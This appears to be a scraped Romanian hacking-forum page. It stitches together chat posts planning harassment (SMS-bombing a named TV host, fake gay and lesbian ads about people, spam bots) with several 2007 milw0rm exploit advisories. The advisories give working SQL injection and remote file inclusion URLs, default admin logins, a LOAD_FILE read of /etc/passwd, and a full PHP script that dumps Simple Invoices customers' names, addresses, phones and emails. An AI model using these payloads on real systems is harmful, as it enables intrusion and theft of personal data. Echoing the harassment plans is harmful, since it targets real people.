hex

Cum sa dai 750 $ pe asa ceva ? Daca stii javascript in 2 zile til faci singur

crysis 2 ...

ofer $1 USD

toate cartele de DIGI (telefon,net) merg doar pe 3G deci iti trebuie un telefon compatibil 3G ca sa poti sa le folosesti. pe iphone 3G merge netu cu cartela de digi doar daca este 3G activat

local file inclusion

Iti trebuie si un lfi altfel nu ai ce sa faci.

eu zic sa incerci un thirdlife

cauti 10 siteuri care trimit sms free deschizi cate zece instante pt fiecare dai copy paste la mesaje si dupaia mergi din tab in tab si dai send

ok dar pentru baieti bagam anunturi la gay si pt fete la lesbi

pt mircea ar fi tare un sms bombing exact cand are emisiune ca sta cu telefonu langa el tot timpu. reactia lui badea = priceless (am curaj sa pun pariu ca da cu telefonu de pamant)

asta ar fi mortala da nu stiu daca e asa de usor precum pare

daca am putea face rost de nr de tel a lui badea ar fi tare

FII e cea mai tare

prea tare sper sa repetam raidu asta edit: are careva idee cum as putea interactiona cu un flash player de genu asta sa fac un bot care sa spammeze automat ?

asteptam varianta care omoara si oameni

thanks ANdreicj

suna extrem de interesant. are cineva mai multe detalii despre subiect?

super funny ideea. daca va apucati de chestia asta incercati sa bagati si keyword-uri in asa fel incat orice or cauta oamnii sa dea de anunturile voastre. Asteptam rezultate si reactii

sunt o gramada. Puteti sa incercati si cu yopmail.com e o alternativa mailinator .... si nu trebuie sa va chinuiti sa bagati captcha-uri

+______________________________________________By Crackers_Child___________________________________________+ * * * [~] Portal.......: 6ALBlog All Versions * [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar * [~] Author.......: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com * [~] Class........: Remote SQL Injection and Remote File ?nclude Vulnerability * [~] Dork.........: inurl:"member.php?page=comments +_______________________________________________________________________________________________________________________+ +_______________________________________________________________________________________________________________________+ * * * [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/* * http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/* * * * [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work * * http://[Taget]/[Path]/admin/index.php?pg=Sh3ll? +_______________________________________________________________________________________________________________________+ [~] ?nfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone and you can write it on exploit "MEMBERNAME" area +_______________________________________________________________________________________________________________________+ +_______________________________________________________________________________________________________________________+ * * * [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends * +_______________________________________________________________________________________________________________________+ # milw0rm.com [2007-06-25]

--==+================================================================================+==-- --==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks ) SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834 SITE: http://www.bug-mall.org DORK: Powered by Bug Software intext:Your Cart Contains EXPLOITS: EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[html, JAVASCRIPT] EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail. EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites and sucsefully logged in. EXAMPLES: EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY t0pP8uZz h4cky0u.org</body><html> EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script> EXAMPLE 3: Paste following into search box ' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/* Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION. GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net FROM GM!: Kw3[R]ln get over it . --==+================================================================================+==-- --==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==-- --==+================================================================================+==-- # milw0rm.com [2007-06-25]

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion Vulnerabilities # D.Script : http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip # V.Code : include $tfooter # In : footer.inc.php # Exploits : http://www.name/path/footer.inc.php?tfooter=shell? # Discovered by: Rf7awy x59@hotmail.it thanks Mahmood_ali # Homepage: http://www.Tryag.Com/cc # Sp.Thanx To : Tryag-Team # milw0rm.com [2007-06-25]

Application: phpTrafficA <= 1.4.2 Web Site: http://soft.zoneo.net/phpTrafficA/ Versions: all Platform: linux, windows Bug: injection sql ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =========== 1) Introduction =========== "phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL. It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!" ====== 2) Bug ====== injection sql ===== 3)proof of concept ===== exemple of exploitation : 1)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,@@version/* 2)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)/* --> load some file as /etc/passwd or /path/www/stats/Php/config_sql.php ?lang= is also vulnerable to xss attacks, and as Hamid Ebadi has mention $lang is also vulnerable to directory transversal ===== 4)Credits ===== laurent gaffie contact : laurent.gaffie@gmail.com # milw0rm.com [2007-06-24]

<?/* Exploit Name: Simple Invoices 2007 05 25 (index.php submit) Remote SQL Injection Exploit Script homepage/download/demo: http://simpleinvoices.org/ Discovered by: Kacper (kacper1964@yahoo.pl) Kacper Hacking & Security Blog: http://kacper.bblog.pl/ ^()* => Homepage: http://devilteam.eu/ <= *()^ Irc: irc.milw0rm.com:6667 #devilteam Pozdro dla wszystkich ludzi z #devilteam oraz devilteam.eu/forum !! */ if ($argc<4) { print_r(' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Usage: php '.$argv[0].' host path user_id OPTIONS host: target server (ip/hostname) path: Simple_Invoices path user_id: Customer ID Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' 127.0.0.1 /Simple_Invoices/ 1 php '.$argv[0].' 127.0.0.1 /Simple_Invoices/ 2 -P1.1.1.1:80 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- '); die; } error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; function wyslijpakiet($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); $parts[1]=(int)$parts[1]; echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $user_id=$argv[3]; $prefix=""; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=(int)str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die("Bad path!");} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} function char_convert($my_string) { $encoded="CHAR("; for ($k=0; $k<=strlen($my_string)-1; $k++) { $encoded.=ord($my_string[$k]); if ($k==strlen($my_string)-1) {$encoded.=")";} else {$encoded.=",";} } return $encoded; } print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n"; $packet ="GET ".$p."index.php?module=invoices&view=email&stage=1&submit=-1/*+DEVIL+TEAM+*/union/*+devilteam.eu+*/select/*+POLISH+TEAM+*/CONCAT(".char_convert("<DEVIL_TEAM-[").",name,".char_convert(":").",street_address,".char_convert(":").",street_address2,".char_convert(":").",city,".char_convert(":").",state,".char_convert(":").",country,".char_convert(":").",phone,".char_convert(":").",mobile_phone,".char_convert(":").",email,".char_convert("]-Kacper>")."),1,2,3,4,5,6,7,8,9,10/**/FROM/*table=>*/si_customers/*+and+*/WHERE/*+user+ID+*/id=".$user_id."/* HTTP/1.0\r\n"; $packet.="Referer: http://".$host.$path."index.php\r\n"; $packet.="Accept-Language: pl\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t=explode("<DEVIL_TEAM-[",$html); $t2=explode("]-Kacper>",$t[1]); $calosc=$t2[0]; $dane=explode(":",$calosc); echo "Customer Name: ".$dane[0]."\r\n"; echo "Customer Street: ".$dane[1]."\r\n"; echo "Customer Street address 2: ".$dane[2]."\r\n"; echo "Customer City: ".$dane[3]."\r\n"; echo "Customer State: ".$dane[4]."\r\n"; echo "Customer Country: ".$dane[5]."\r\n"; echo "Customer Phone: ".$dane[6]."\r\n"; echo "Customer Mobile Phone: ".$dane[7]."\r\n"; echo "Customer Email: ".$dane[8]."\r\n"; print "++++++++++++++++++++++ DONE ++++++++++++++++++++\r\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n"; ?> # milw0rm.com [2007-06-24]

###Dagger-web engine(cal.func.php)Remote File Inclusion### #download: http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007. zip #found by: katatafish (karatatata@hush.com) #code: (cal.func.php) include($dir_edge_lang.'cal_lang.inc.php'); #exploit: http://www.site.com/[path]/cal.func.php?dir_edge_lang=[sHELL] #Thanks: str0ke # milw0rm.com [2007-06-24]